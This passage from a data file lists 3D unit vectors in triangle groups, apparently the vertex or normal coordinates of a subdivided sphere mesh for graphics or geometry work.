[0.461539924145,0.878655850887,-0.122248865664],
[0.464636415243,0.88455080986,-0.0410230122507],
[0.524005174637,0.847858190536,-0.0809632539749],
[0.395605653524,0.903840482235,-0.162998497486],
[0.461539924145,0.878655850887,-0.122248865664],
[0.455528259277,0.867211103439,-0.20109423995],
[0.196501940489,0.97295331955,-0.121444880962],
[0.197802826762,0.979394435883,-0.0407496243715],
[0.265506535769,0.960611641407,-0.0820460245013],
[0.0638479366899,0.997179210186,-0.0394601933658],
[0.0638479366899,0.997179210186,0.0394601933658],
[0.130150929093,0.991494178772,0.0],
[0.197802826762,0.979394435883,0.0407496243715],
[0.196501940489,0.97295331955,0.121444880962],
[0.265506535769,0.960611641407,0.0820460245013],
[0.130150929093,0.991494178772,0.0],
[0.197802826762,0.979394435883,0.0407496243715],
[0.197802826762,0.979394435883,-0.0407496243715],
[0.464636415243,0.88455080986,0.0410230122507],
[0.461539924145,0.878655850887,0.122248865664],
[0.524005174637,0.847858190536,0.0809632539749],
[0.33188316226,0.935258030891,0.123069040477],
[0.327503234148,0.922915279865,0.202408134937],
[0.395605653524,0.903840482235,0.162998497486],
[0.455528259277,0.867211103439,0.20109423995],
[0.446935534477,0.85085272789,0.276221334934],
[0.510783493519,0.826465010643,0.236761152744],
[0.395605653524,0.903840482235,0.162998497486],
[0.455528259277,0.867211103439,0.20109423995],
[0.461539924145,0.878655850887,0.122248865664],
[0.265506535769,0.960611641407,-0.0820460245013],
[0.334140062332,0.941618084908,-0.04130198434],
[0.33188316226,0.935258030891,-0.123069040477],
[0.265506535769,0.960611641407,0.0820460245013],
[0.33188316226,0.935258030891,0.123069040477],
[0.334140062332,0.941618084908,0.04130198434],
[0.400968074799,0.916092038155,0.0],
[0.464636415243,0.88455080986,0.0410230122507],
[0.464636415243,0.88455080986,-0.0410230122507],
[0.334140062332,0.941618084908,0.04130198434],
[0.400968074799,0.916092038155,0.0],
[0.334140062332,0.941618084908,-0.04130198434],
[0.82464236021,0.564633131027,0.0339771322906],
[0.830952167511,0.548688352108,0.091976031661],
[0.858619451523,0.509656965733,0.0549761541188],
[0.757922053337,0.643326640129,0.108097285032],
[0.759706020355,0.627150595188,0.171839639544],
[0.798110127449,0.588087081909,0.131048902869],
[0.834331154823,0.529480218887,0.153434738517],
[0.834127128124,0.506734728813,0.217834427953],
[0.866019308567,0.468421578407,0.174905076623],
[0.798110127449,0.588087081909,0.131048902869],
[0.834331154823,0.529480218887,0.153434738517],
[0.830952167511,0.548688352108,0.091976031661],
[0.669747889042,0.718357801437,0.188148602843],
[0.665616393089,0.700865805149,0.256401896477],
[0.715529501438,0.665048420429,0.213841319084],
[0.560828924179,0.782811582088,0.269586592913],
[0.550243675709,0.762617051601,0.340069264174],
[0.610302150249,0.733673810959,0.298754066229],
[0.657660841942,0.678621411324,0.327040165663],
[0.645450055599,0.65135627985,0.398910075426],
[0.701809465885,0.618283927441,0.353819847107],
[0.610302150249,0.733673810959,0.298754066229],
[0.657660841942,0.678621411324,0.327040165663],
[0.665616393089,0.700865805149,0.256401896477],
[0.829719662666,0.480284929276,0.284414708614],
[0.820587992668,0.450116455555,0.352179646492],
[0.857896447182,0.413926929235,0.3044308424],
[0.74177056551,0.553625464439,0.378517180681],
[0.726413309574,0.520354926586,0.44894811511],
[0.776785671711,0.485873311758,0.400663375854],
[0.806385576725,0.416404157877,0.419940322638],
[0.787004828453,0.379529476166,0.486395716667],
[0.830415487289,0.346611320972,0.436200261116],
[0.776785671711,0.485873311758,0.400663375854],
[0.806385576725,0.416404157877,0.419940322638],
[0.820587992668,0.450116455555,0.352179646492],
[0.715529501438,0.665048420429,0.213841319084],
[0.757998526096,0.606988489628,0.238753452897],
[0.759706020355,0.627150595188,0.171839639544],
[0.701809465885,0.618283927441,0.353819847107],
[0.74177056551,0.553625464439,0.378517180681],
[0.752189457417,0.582528710365,0.308011889458],
[0.796284377575,0.545040607452,0.26241543889],
[0.829719662666,0.480284929276,0.284414708614],
[0.834127128124,0.506734728813,0.217834427953],
[0.752189457417,0.582528710365,0.308011889458],
[0.796284377575,0.545040607452,0.26241543889],
[0.757998526096,0.606988489628,0.238753452897],
[0.436200261116,0.830415487289,0.346611320972],
[0.419940322638,0.806385576725,0.416404157877],
[0.486395716667,0.787004828453,0.379529476166],
[0.3044308424,0.857896447182,0.413926929235],
[0.284414708614,0.829719662666,0.480284929276],
[0.352179646492,0.820587992668,0.450116455555],
[0.400663375854,0.776785671711,0.485873311758],
[0.378517180681,0.74177056551,0.553625464439],
[0.44894811511,0.726413309574,0.520354926586],
[0.352179646492,0.820587992668,0.450116455555],
[0.400663375854,0.776785671711,0.485873311758],
[0.419940322638,0.806385576725,0.416404157877],
[0.174905076623,0.866019308567,0.468421578407],
[0.153434738517,0.834331154823,0.529480218887],
[0.217834427953,0.834127128124,0.506734728813],
[0.0549761541188,0.858619451523,0.509656965733],
[0.0339771322906,0.82464236021,0.564633131027],
[0.091976031661,0.830952167511,0.548688352108],
[0.131048902869,0.798110127449,0.588087081909],
[0.108097285032,0.757922053337,0.643326640129],
[0.171839639544,0.759706020355,0.627150595188],
[0.091976031661,0.830952167511,0.548688352108],
[0.131048902869,0.798110127449,0.588087081909],
[0.153434738517,0.834331154823,0.529480218887],
[0.353819847107,0.701809465885,0.618283927441],
[0.327040165663,0.657660841942,0.678621411324],
[0.398910075426,0.645450055599,0.65135627985],
[0.213841319084,0.715529501438,0.665048420429],
[0.188148602843,0.669747889042,0.718357801437],
[0.256401896477,0.665616393089,0.700865805149],
[0.298754066229,0.610302150249,0.733673810959],
[0.269586592913,0.560828924179,0.782811582088],
[0.340069264174,0.550243675709,0.762617051601],
[0.256401896477,0.665616393089,0.700865805149],
[0.298754066229,0.610302150249,0.733673810959],
[0.327040165663,0.657660841942,0.678621411324],
[0.217834427953,0.834127128124,0.506734728813],
[0.26241543889,0.796284377575,0.545040607452],
[0.284414708614,0.829719662666,0.480284929276],
[0.171839639544,0.759706020355,0.627150595188],
[0.213841319084,0.715529501438,0.665048420429],
[0.238753452897,0.757998526096,0.606988489628],
[0.308011889458,0.752189457417,0.582528710365],
[0.353819847107,0.701809465885,0.618283927441],
[0.378517180681,0.74177056551,0.553625464439],
[0.238753452897,0.757998526096,0.606988489628],
[0.308011889458,0.752189457417,0.582528710365],
[0.26241543889,0.796284377575,0.545040607452],
[0.762617051601,0.340069264174,0.550243675709],
[0.733673810959,0.298754066229,0.610302150249],
[0.782811582088,0.269586592913,0.560828924179],
[0.65135627985,0.398910075426,0.645450055599],
[0.618283927441,0.353819847107,0.701809465885],
[0.678621411324,0.327040165663,0.657660841942],
[0.700865805149,0.256401896477,0.665616393089],
[0.665048420429,0.213841319084,0.715529501438],
[0.718357801437,0.188148602843,0.669747889042],
[0.678621411324,0.327040165663,0.657660841942],
[0.700865805149,0.256401896477,0.665616393089],
[0.733673810959,0.298754066229,0.610302150249],
[0.520354926586,0.44894811511,0.726413309574],
[0.485873311758,0.400663375854,0.776785671711],
[0.553625464439,0.378517180681,0.74177056551],
[0.379529476166,0.486395716667,0.787004828453],
[0.346611320972,0.436200261116,0.830415487289],
[0.416404157877,0.419940322638,0.806385576725],
[0.450116455555,0.352179646492,0.820587992668],
[0.413926929235,0.3044308424,0.857896447182],
[0.480284929276,0.284414708614,0.829719662666],
[0.416404157877,0.419940322638,0.806385576725],
[0.450116455555,0.352179646492,0.820587992668],
[0.485873311758,0.400663375854,0.776785671711],
[0.627150595188,0.171839639544,0.759706020355],
[0.588087081909,0.131048902869,0.798110127449],
[0.643326640129,0.108097285032,0.757922053337],
[0.506734728813,0.217834427953,0.834127128124],
[0.468421578407,0.174905076623,0.866019308567],
[0.529480218887,0.153434738517,0.834331154823],
[0.548688352108,0.091976031661,0.830952167511],
[0.509656965733,0.0549761541188,0.858619451523],
[0.564633131027,0.0339771322906,0.82464236021],
[0.529480218887,0.153434738517,0.834331154823],
[0.548688352108,0.091976031661,0.830952167511],
[0.588087081909,0.131048902869,0.798110127449],
[0.553625464439,0.378517180681,0.74177056551],
[0.582528710365,0.308011889458,0.752189457417],
[0.618283927441,0.353819847107,0.701809465885],
[0.480284929276,0.284414708614,0.829719662666],
[0.506734728813,0.217834427953,0.834127128124],
[0.545040607452,0.26241543889,0.796284377575],
[0.606988489628,0.238753452897,0.757998526096],
[0.627150595188,0.171839639544,0.759706020355],
[0.665048420429,0.213841319084,0.715529501438],
[0.545040607452,0.26241543889,0.796284377575],
[0.606988489628,0.238753452897,0.757998526096],
[0.582528710365,0.308011889458,0.752189457417],
[0.486395716667,0.787004828453,0.379529476166],
[0.535965919495,0.737060189247,0.411682873964],
[0.550243675709,0.762617051601,0.340069264174],
[0.44894811511,0.726413309574,0.520354926586],
[0.495975226164,0.669751524925,0.552667617798],
[0.517854511738,0.706037700176,0.483050197363],
[0.58378881216,0.680853009224,0.44230055809],
[0.628728508949,0.619044244289,0.470621615648],
[0.645450055599,0.65135627985,0.398910075426],
[0.517854511738,0.706037700176,0.483050197363],
[0.58378881216,0.680853009224,0.44230055809],
[0.535965919495,0.737060189247,0.411682873964],
[0.398910075426,0.645450055599,0.65135627985],
[0.44230055809,0.58378881216,0.680853009224],
[0.470621615648,0.628728508949,0.619044244289],
[0.340069264174,0.550243675709,0.762617051601],
[0.379529476166,0.486395716667,0.787004828453],
[0.411682873964,0.535965919495,0.737060189247],
[0.483050197363,0.517854511738,0.706037700176],
[0.520354926586,0.44894811511,0.726413309574],
[0.552667617798,0.495975226164,0.669751524925],
[0.411682873964,0.535965919495,0.737060189247],
[0.483050197363,0.517854511738,0.706037700176],
[0.44230055809,0.58378881216,0.680853009224],
[0.669751524925,0.552667617798,0.495975226164],
[0.706037700176,0.483050197363,0.517854511738],
[0.726413309574,0.520354926586,0.44894811511],
[0.619044244289,0.470621615648,0.628728508949],
[0.65135627985,0.398910075426,0.645450055599],
[0.680853009224,0.44230055809,0.58378881216],
[0.737060189247,0.411682873964,0.535965919495],
[0.762617051601,0.340069264174,0.550243675709],
[0.787004828453,0.379529476166,0.486395716667],
[0.680853009224,0.44230055809,0.58378881216],
[0.737060189247,0.411682873964,0.535965919495],
[0.706037700176,0.483050197363,0.517854511738],
[0.470621615648,0.628728508949,0.619044244289],
[0.540649950504,0.607478022575,0.581951975822],
[0.495975226164,0.669751524925,0.552667617798],
[0.552667617798,0.495975226164,0.669751524925],
[0.619044244289,0.470621615648,0.628728508949],
[0.581951975822,0.540649950504,0.607478022575],
[0.607478022575,0.581951975822,0.540649950504],
[0.669751524925,0.552667617798,0.495975226164],
[0.628728508949,0.619044244289,0.470621615648],
[0.581951975822,0.540649950504,0.607478022575],
[0.607478022575,0.581951975822,0.540649950504],
[0.540649950504,0.607478022575,0.581951975822],
[0.8796184659,-0.475679844618,0.0],
[0.887796461582,-0.456712335348,0.0568443164229],
[0.858619451523,-0.509656965733,0.0549761541188],
[0.932827115059,-0.360324263573,0.0],
[0.940329909325,-0.334895044565,0.0602079555392],
[0.915323853493,-0.398431301117,0.0586068555713],
[0.892938017845,-0.434652328491,0.117213711143],
[0.894335091114,-0.409316182137,0.180623859167],
[0.866019308567,-0.468421578407,0.174905076623],
[0.915323853493,-0.398431301117,0.0586068555713],
[0.892938017845,-0.434652328491,0.117213711143],
[0.887796461582,-0.456712335348,0.0568443164229],
[0.974178731441,-0.225778326392,0.0],
[0.979053080082,-0.193714544177,0.0626873448491],
[0.961880862713,-0.266443610191,0.0615878328681],
[0.997029185295,-0.0770247355103,0.0],
[0.997179210186,-0.0394601933658,0.0638479366899],
[0.991025745869,-0.117650069296,0.0634539350867],
[0.978907585144,-0.158833146095,0.128498718143],
[0.97295331955,-0.121444880962,0.196501940489],
[0.960443258286,-0.199805602431,0.193975359201],
[0.991025745869,-0.117650069296,0.0634539350867],
[0.978907585144,-0.158833146095,0.128498718143],
[0.979053080082,-0.193714544177,0.0626873448491],
[0.891307473183,-0.380633711815,0.246351331472],
[0.883275330067,-0.348686188459,0.313436716795],
[0.857896447182,-0.413926929235,0.3044308424],
[0.935745954514,-0.239766731858,0.258633822203],
[0.922915279865,-0.202408134937,0.327503234148],
[0.905284404755,-0.277958005667,0.321246802807],
[0.869839549065,-0.313733518124,0.380723625422],
[0.85085272789,-0.276221334934,0.446935534477],
[0.830415487289,-0.346611320972,0.436200261116],
[0.905284404755,-0.277958005667,0.321246802807],
[0.869839549065,-0.313733518124,0.380723625422],
[0.883275330067,-0.348686188459,0.313436716795],
[0.961880862713,-0.266443610191,0.0615878328681],
[0.943842172623,-0.306287169456,0.123895764351],
[0.940329909325,-0.334895044565,0.0602079555392],
[0.960443258286,-0.199805602431,0.193975359201],
[0.935745954514,-0.239766731858,0.258633822203],
[0.942551255226,-0.274516820908,0.190361812711],
[0.920180141926,-0.34457308054,0.185843646526],
[0.891307473183,-0.380633711815,0.246351331472],
[0.894335091114,-0.409316182137,0.180623859167],
[0.942551255226,-0.274516820908,0.190361812711],
[0.920180141926,-0.34457308054,0.185843646526],
[0.943842172623,-0.306287169456,0.123895764351],
[0.997029185295,0.0770247355103,0.0],
[0.991025745869,0.117650069296,0.0634539350867],
[0.997179210186,0.0394601933658,0.0638479366899],
[0.974178731441,0.225778326392,0.0],
[0.961880862713,0.266443610191,0.0615878328681],
[0.979053080082,0.193714544177,0.0626873448491],
[0.978907585144,0.158833146095,0.128498718143],
[0.960443258286,0.199805602431,0.193975359201],
[0.97295331955,0.121444880962,0.196501940489],
[0.979053080082,0.193714544177,0.0626873448491],
[0.978907585144,0.158833146095,0.128498718143],
[0.991025745869,0.117650069296,0.0634539350867],
[0.932827115059,0.360324263573,0.0],
[0.915323853493,0.398431301117,0.0586068555713],
[0.940329909325,0.334895044565,0.0602079555392],
[0.8796184659,0.475679844618,0.0],
[0.858619451523,0.509656965733,0.0549761541188],
[0.887796461582,0.456712335348,0.0568443164229],
[0.892938017845,0.434652328491,0.117213711143],
[0.866019308567,0.468421578407,0.174905076623],
[0.894335091114,0.409316182137,0.180623859167],
[0.887796461582,0.456712335348,0.0568443164229],
[0.892938017845,0.434652328491,0.117213711143],
[0.915323853493,0.398431301117,0.0586068555713],
[0.935745954514,0.239766731858,0.258633822203],
[0.905284404755,0.277958005667,0.321246802807],
[0.922915279865,0.202408134937,0.327503234148],
[0.891307473183,0.380633711815,0.246351331472],
[0.857896447182,0.413926929235,0.3044308424],
[0.883275330067,0.348686188459,0.313436716795],
[0.869839549065,0.313733518124,0.380723625422],
[0.830415487289,0.346611320972,0.436200261116],
[0.85085272789,0.276221334934,0.446935534477],
[0.883275330067,0.348686188459,0.313436716795],
[0.869839549065,0.313733518124,0.380723625422],
[0.905284404755,0.277958005667,0.321246802807],
[0.940329909325,0.334895044565,0.0602079555392],
[0.943842172623,0.306287169456,0.123895764351],
[0.961880862713,0.266443610191,0.0615878328681],
[0.894335091114,0.409316182137,0.180623859167],
[0.891307473183,0.380633711815,0.246351331472],
[0.920180141926,0.34457308054,0.185843646526],
[0.942551255226,0.274516820908,0.190361812711],
[0.935745954514,0.239766731858,0.258633822203],
[0.960443258286,0.199805602431,0.193975359201],
[0.920180141926,0.34457308054,0.185843646526],
[0.942551255226,0.274516820908,0.190361812711],
[0.943842172623,0.306287169456,0.123895764351],
[0.826465010643,-0.236761152744,0.510783493519],
[0.797127783298,-0.196083456278,0.571085453033],
[0.782811582088,-0.269586592913,0.560828924179],
[0.847858190536,-0.0809632539749,0.524005174637],
[0.81225925684,-0.0399611219764,0.581926107407],
[0.807120084763,-0.119124859571,0.578244268894],
[0.763553202152,-0.154971644282,0.62687343359],
[0.726636230946,-0.114190116525,0.677466154099],
[0.718357801437,-0.188148602843,0.669747889042],
[0.807120084763,-0.119124859571,0.578244268894],
[0.763553202152,-0.154971644282,0.62687343359],
[0.797127783298,-0.196083456278,0.571085453033],
[0.847858190536,0.0809632539749,0.524005174637],
[0.807120084763,0.119124859571,0.578244268894],
[0.81225925684,0.0399611219764,0.581926107407],
[0.826465010643,0.236761152744,0.510783493519],
[0.782811582088,0.269586592913,0.560828924179],
[0.797127783298,0.196083456278,0.571085453033],
[0.763553202152,0.154971644282,0.62687343359],
[0.718357801437,0.188148602843,0.669747889042],
[0.726636230946,0.114190116525,0.677466154099],
[0.797127783298,0.196083456278,0.571085453033],
[0.763553202152,0.154971644282,0.62687343359],
[0.807120084763,0.119124859571,0.578244268894],
[0.687358558178,-0.0744211226702,0.722495436668],
[0.646693944931,-0.0362210273743,0.761889100075],
[0.643326640129,-0.108097285032,0.757922053337],
[0.687358558178,0.0744211226702,0.722495436668],
[0.643326640129,0.108097285032,0.757922053337],
[0.646693944931,0.0362210273743,0.761889100075],
[0.605532705784,0.0,0.79582041502],
[0.564633131027,0.0339771322906,0.82464236021],
[0.564633131027,-0.0339771322906,0.82464236021],
[0.646693944931,0.0362210273743,0.761889100075],
[0.605532705784,0.0,0.79582041502],
[0.646693944931,-0.0362210273743,0.761889100075],
[0.81225925684,0.0399611219764,0.581926107407],
[0.772890508175,0.0,0.634539365768],
[0.81225925684,-0.0399611219764,0.581926107407],
[0.726636230946,0.114190116525,0.677466154099],
[0.687358558178,0.0744211226702,0.722495436668],
[0.730884253979,0.0382858961821,0.68142670393],
[0.730884253979,-0.0382858961821,0.68142670393],
[0.687358558178,-0.0744211226702,0.722495436668],
[0.726636230946,-0.114190116525,0.677466154099],
[0.730884253979,0.0382858961821,0.68142670393],
[0.730884253979,-0.0382858961821,0.68142670393],
[0.772890508175,0.0,0.634539365768],
[0.997179210186,0.0394601933658,0.0638479366899],
[0.991494178772,0.0,0.130150929093],
[0.997179210186,-0.0394601933658,0.0638479366899],
[0.97295331955,0.121444880962,0.196501940489],
[0.960611641407,0.0820460245013,0.265506535769],
[0.979394435883,0.0407496243715,0.197802826762],
[0.979394435883,-0.0407496243715,0.197802826762],
[0.960611641407,-0.0820460245013,0.265506535769],
[0.97295331955,-0.121444880962,0.196501940489],
[0.979394435883,0.0407496243715,0.197802826762],
[0.979394435883,-0.0407496243715,0.197802826762],
[0.991494178772,0.0,0.130150929093],
[0.922915279865,0.202408134937,0.327503234148],
[0.903840482235,0.162998497486,0.395605653524],
[0.935258030891,0.123069040477,0.33188316226],
[0.85085272789,0.276221334934,0.446935534477],
[0.826465010643,0.236761152744,0.510783493519],
[0.867211103439,0.20109423995,0.455528259277],
[0.878655850887,0.122248865664,0.461539924145],
[0.847858190536,0.0809632539749,0.524005174637],
[0.88455080986,0.0410230122507,0.464636415243],
[0.867211103439,0.20109423995,0.455528259277],
[0.878655850887,0.122248865664,0.461539924145],
[0.903840482235,0.162998497486,0.395605653524],
[0.935258030891,-0.123069040477,0.33188316226],
[0.903840482235,-0.162998497486,0.395605653524],
[0.922915279865,-0.202408134937,0.327503234148],
[0.88455080986,-0.0410230122507,0.464636415243],
[0.847858190536,-0.0809632539749,0.524005174637],
[0.878655850887,-0.122248865664,0.461539924145],
[0.867211103439,-0.20109423995,0.455528259277],
[0.826465010643,-0.236761152744,0.510783493519],
[0.85085272789,-0.276221334934,0.446935534477],
[0.878655850887,-0.122248865664,0.461539924145],
[0.867211103439,-0.20109423995,0.455528259277],
[0.903840482235,-0.162998497486,0.395605653524],
[0.935258030891,0.123069040477,0.33188316226],
[0.941618084908,0.04130198434,0.334140062332],
[0.960611641407,0.0820460245013,0.265506535769],
[0.88455080986,0.0410230122507,0.464636415243],
[0.88455080986,-0.0410230122507,0.464636415243],
[0.916092038155,0.0,0.400968074799],
[0.941618084908,-0.04130198434,0.334140062332],
[0.935258030891,-0.123069040477,0.33188316226],
[0.960611641407,-0.0820460245013,0.265506535769],
[0.916092038155,0.0,0.400968074799],
[0.941618084908,-0.04130198434,0.334140062332],
[0.941618084908,0.04130198434,0.334140062332],
[-0.564633131027,0.0339771322906,0.82464236021],
[-0.605532705784,0.0,0.79582041502],
[-0.564633131027,-0.0339771322906,0.82464236021],
[-0.643326640129,0.108097285032,0.757922053337],
[-0.687358558178,0.0744211226702,0.722495436668],
[-0.646693944931,0.0362210273743,0.761889100075],
[-0.646693944931,-0.0362210273743,0.761889100075],
[-0.687358558178,-0.0744211226702,0.722495436668],
[-0.643326640129,-0.108097285032,0.757922053337],
[-0.646693944931,0.0362210273743,0.761889100075],
[-0.646693944931,-0.0362210273743,0.761889100075],
[-0.605532705784,0.0,0.79582041502],
[-0.718357801437,0.188148602843,0.669747889042],
[-0.763553202152,0.154971644282,0.62687343359],
[-0.726636230946,0.114190116525,0.677466154099],
[-0.782811582088,0.269586592913,0.560828924179],
[-0.826465010643,0.236761152744,0.510783493519],
[-0.797127783298,0.196083456278,0.571085453033],
[-0.807120084763,0.119124859571,0.578244268894],
[-0.847858190536,0.0809632539749,0.524005174637],
[-0.81225925684,0.0399611219764,0.581926107407],
[-0.797127783298,0.196083456278,0.571085453033],
[-0.807120084763,0.119124859571,0.578244268894],
[-0.763553202152,0.154971644282,0.62687343359],
[-0.726636230946,-0.114190116525,0.677466154099],
[-0.763553202152,-0.154971644282,0.62687343359],
[-0.718357801437,-0.188148602843,0.669747889042],
[-0.81225925684,-0.0399611219764,0.581926107407],
[-0.847858190536,-0.0809632539749,0.524005174637],
[-0.807120084763,-0.119124859571,0.578244268894],
[-0.797127783298,-0.196083456278,0.571085453033],
[-0.826465010643,-0.236761152744,0.510783493519],
[-0.782811582088,-0.269586592913,0.560828924179],
[-0.807120084763,-0.119124859571,0.578244268894],
[-0.797127783298,-0.196083456278,0.571085453033],
[-0.763553202152,-0.154971644282,0.62687343359],
[-0.726636230946,0.114190116525,0.677466154099],
[-0.730884253979,0.0382858961821,0.68142670393],
[-0.687358558178,0.0744211226702,0.722495436668],
[-0.81225925684,0.0399611219764,0.581926107407],
[-0.81225925684,-0.0399611219764,0.581926107407],
[-0.772890508175,0.0,0.634539365768],
[-0.730884253979,-0.0382858961821,0.68142670393],
[-0.726636230946,-0.114190116525,0.677466154099],
[-0.687358558178,-0.0744211226702,0.722495436668],
[-0.772890508175,0.0,0.634539365768],
[-0.730884253979,-0.0382858961821,0.68142670393],
[-0.730884253979,0.0382858961821,0.68142670393],
[-0.830415487289,0.346611320972,0.436200261116],
[-0.869839549065,0.313733518124,0.380723625422],
[-0.85085272789,0.276221334934,0.446935534477],
[-0.857896447182,0.413926929235,0.3044308424],
[-0.891307473183,0.380633711815,0.246351331472],
[-0.883275330067,0.348686188459,0.313436716795],
[-0.905284404755,0.277958005667,0.321246802807],
[-0.935745954514,0.239766731858,0.258633822203],
[-0.922915279865,0.202408134937,0.327503234148],
[-0.883275330067,0.348686188459,0.313436716795],
[-0.905284404755,0.277958005667,0.321246802807],
[-0.869839549065,0.313733518124,0.380723625422],
[-0.866019308567,0.468421578407,0.174905076623],
[-0.892938017845,0.434652328491,0.117213711143],
[-0.894335091114,0.409316182137,0.180623859167],
[-0.858619451523,0.509656965733,0.0549761541188],
[-0.8796184659,0.475679844618,0.0],
[-0.887796461582,0.456712335348,0.0568443164229],
[-0.915323853493,0.398431301117,0.0586068555713],
[-0.932827115059,0.360324263573,0.0],
[-0.940329909325,0.334895044565,0.0602079555392],
[-0.887796461582,0.456712335348,0.0568443164229],
[-0.915323853493,0.398431301117,0.0586068555713],
[-0.892938017845,0.434652328491,0.117213711143],
[-0.960443258286,0.199805602431,0.193975359201],
[-0.978907585144,0.158833146095,0.128498718143],
[-0.97295331955,0.121444880962,0.196501940489],
[-0.961880862713,0.266443610191,0.0615878328681],
[-0.974178731441,0.225778326392,0.0],
[-0.979053080082,0.193714544177,0.0626873448491],
[-0.991025745869,0.117650069296,0.0634539350867],
[-0.997029185295,0.0770247355103,0.0],
[-0.997179210186,0.0394601933658,0.0638479366899],
[-0.979053080082,0.193714544177,0.0626873448491],
[-0.991025745869,0.117650069296,0.0634539350867],
[-0.978907585144,0.158833146095,0.128498718143],
[-0.894335091114,0.409316182137,0.180623859167],
[-0.920180141926,0.34457308054,0.185843646526],
[-0.891307473183,0.380633711815,0.246351331472],
[-0.940329909325,0.334895044565,0.0602079555392],
[-0.961880862713,0.266443610191,0.0615878328681],
[-0.943842172623,0.306287169456,0.123895764351],
[-0.942551255226,0.274516820908,0.190361812711],
[-0.960443258286,0.199805602431,0.193975359201],
[-0.935745954514,0.239766731858,0.258633822203],
[-0.943842172623,0.306287169456,0.123895764351],
[-0.942551255226,0.274516820908,0.190361812711],
[-0.920180141926,0.34457308054,0.185843646526],
[-0.85085272789,-0.276221334934,0.446935534477],
[-0.869839549065,-0.313733518124,0.380723625422],
[-0.830415487289,-0.346611320972,0.436200261116],
[-0.922915279865,-0.202408134937,0.327503234148],
[-0.935745954514,-0.239766731858,0.258633822203],
[-0.905284404755,-0.277958005667,0.321246802807],
[-0.883275330067,-0.348686188459,0.313436716795],
[-0.891307473183,-0.380633711815,0.246351331472],
[-0.857896447182,-0.413926929235,0.3044308424],
[-0.905284404755,-0.277958005667,0.321246802807],
[-0.883275330067,-0.348686188459,0.313436716795],
[-0.869839549065,-0.313733518124,0.380723625422],
[-0.97295331955,-0.121444880962,0.196501940489],
[-0.978907585144,-0.158833146095,0.128498718143],
[-0.960443258286,-0.199805602431,0.193975359201],
[-0.997179210186,-0.0394601933658,0.0638479366899],
[-0.997029185295,-0.0770247355103,0.0],
[-0.991025745869,-0.117650069296,0.0634539350867],
[-0.979053080082,-0.193714544177,0.0626873448491],
[-0.974178731441,-0.225778326392,0.0],
[-0.961880862713,-0.266443610191,0.0615878328681],
[-0.991025745869,-0.117650069296,0.0634539350867],
[-0.979053080082,-0.193714544177,0.0626873448491],
[-0.978907585144,-0.158833146095,0.128498718143],
[-0.894335091114,-0.409316182137,0.180623859167],
[-0.892938017845,-0.434652328491,0.117213711143],
[-0.866019308567,-0.468421578407,0.174905076623],
[-0.940329909325,-0.334895044565,0.0602079555392],
[-0.932827115059,-0.360324263573,0.0],
[-0.915323853493,-0.398431301117,0.0586068555713],
[-0.887796461582,-0.456712335348,0.0568443164229],
[-0.8796184659,-0.475679844618,0.0],
[-0.858619451523,-0.509656965733,0.0549761541188],
[-0.915323853493,-0.398431301117,0.0586068555713],
[-0.887796461582,-0.456712335348,0.0568443164229],
[-0.892938017845,-0.434652328491,0.117213711143],
[-0.960443258286,-0.199805602431,0.193975359201],
[-0.942551255226,-0.274516820908,0.190361812711],
[-0.935745954514,-0.239766731858,0.258633822203],
[-0.961880862713,-0.266443610191,0.0615878328681],
[-0.940329909325,-0.334895044565,0.0602079555392],
[-0.943842172623,-0.306287169456,0.123895764351],
[-0.920180141926,-0.34457308054,0.185843646526],
[-0.894335091114,-0.409316182137,0.180623859167],
[-0.891307473183,-0.380633711815,0.246351331472],
[-0.943842172623,-0.306287169456,0.123895764351],
[-0.920180141926,-0.34457308054,0.185843646526],
[-0.942551255226,-0.274516820908,0.190361812711],
[-0.85085272789,0.276221334934,0.446935534477],
[-0.867211103439,0.20109423995,0.455528259277],
[-0.826465010643,0.236761152744,0.510783493519],
[-0.922915279865,0.202408134937,0.327503234148],
[-0.935258030891,0.123069040477,0.33188316226],
[-0.903840482235,0.162998497486,0.395605653524],
[-0.878655850887,0.122248865664,0.461539924145],
[-0.88455080986,0.0410230122507,0.464636415243],
[-0.847858190536,0.0809632539749,0.524005174637],
[-0.903840482235,0.162998497486,0.395605653524],
[-0.878655850887,0.122248865664,0.461539924145],
[-0.867211103439,0.20109423995,0.455528259277],
[-0.97295331955,0.121444880962,0.196501940489],
[-0.979394435883,0.0407496243715,0.197802826762],
[-0.960611641407,0.0820460245013,0.265506535769],
[-0.997179210186,0.0394601933658,0.0638479366899],
[-0.997179210186,-0.0394601933658,0.0638479366899],
[-0.991494178772,0.0,0.130150929093],
[-0.979394435883,-0.0407496243715,0.197802826762],
[-0.97295331955,-0.121444880962,0.196501940489],
[-0.960611641407,-0.0820460245013,0.265506535769],
[-0.991494178772,0.0,0.130150929093],
[-0.979394435883,-0.0407496243715,0.197802826762],
[-0.979394435883,0.0407496243715,0.197802826762],
[-0.88455080986,-0.0410230122507,0.464636415243],
[-0.878655850887,-0.122248865664,0.461539924145],
[-0.847858190536,-0.0809632539749,0.524005174637],
[-0.935258030891,-0.123069040477,0.33188316226],
[-0.922915279865,-0.202408134937,0.327503234148],
[-0.903840482235,-0.162998497486,0.395605653524],
[-0.867211103439,-0.20109423995,0.455528259277],
[-0.85085272789,-0.276221334934,0.446935534477],
[-0.826465010643,-0.236761152744,0.510783493519],
[-0.903840482235,-0.162998497486,0.395605653524],
[-0.867211103439,-0.20109423995,0.455528259277],
[-0.878655850887,-0.122248865664,0.461539924145],
[-0.960611641407,0.0820460245013,0.265506535769],
[-0.941618084908,0.04130198434,0.334140062332],
[-0.935258030891,0.123069040477,0.33188316226],
[-0.960611641407,-0.0820460245013,0.265506535769],
[-0.935258030891,-0.123069040477,0.33188316226],
[-0.941618084908,-0.04130198434,0.334140062332],
[-0.916092038155,0.0,0.400968074799],
[-0.88455080986,-0.0410230122507,0.464636415243],
[-0.88455080986,0.0410230122507,0.464636415243],
[-0.941618084908,-0.04130198434,0.334140062332],
[-0.916092038155,0.0,0.400968074799],
[-0.941618084908,0.04130198434,0.334140062332],
[-0.509656965733,0.0549761541188,0.858619451523],
[-0.548688352108,0.091976031661,0.830952167511],
[-0.564633131027,0.0339771322906,0.82464236021],
[-0.468421578407,0.174905076623,0.866019308567],
[-0.506734728813,0.217834427953,0.834127128124],
[-0.529480218887,0.153434738517,0.834331154823],
[-0.588087081909,0.131048902869,0.798110127449],
[-0.627150595188,0.171839639544,0.759706020355],
[-0.643326640129,0.108097285032,0.757922053337],
[-0.529480218887,0.153434738517,0.834331154823],
[-0.588087081909,0.131048902869,0.798110127449],
[-0.548688352108,0.091976031661,0.830952167511],
[-0.413926929235,0.3044308424,0.857896447182],
[-0.450116455555,0.352179646492,0.820587992668],
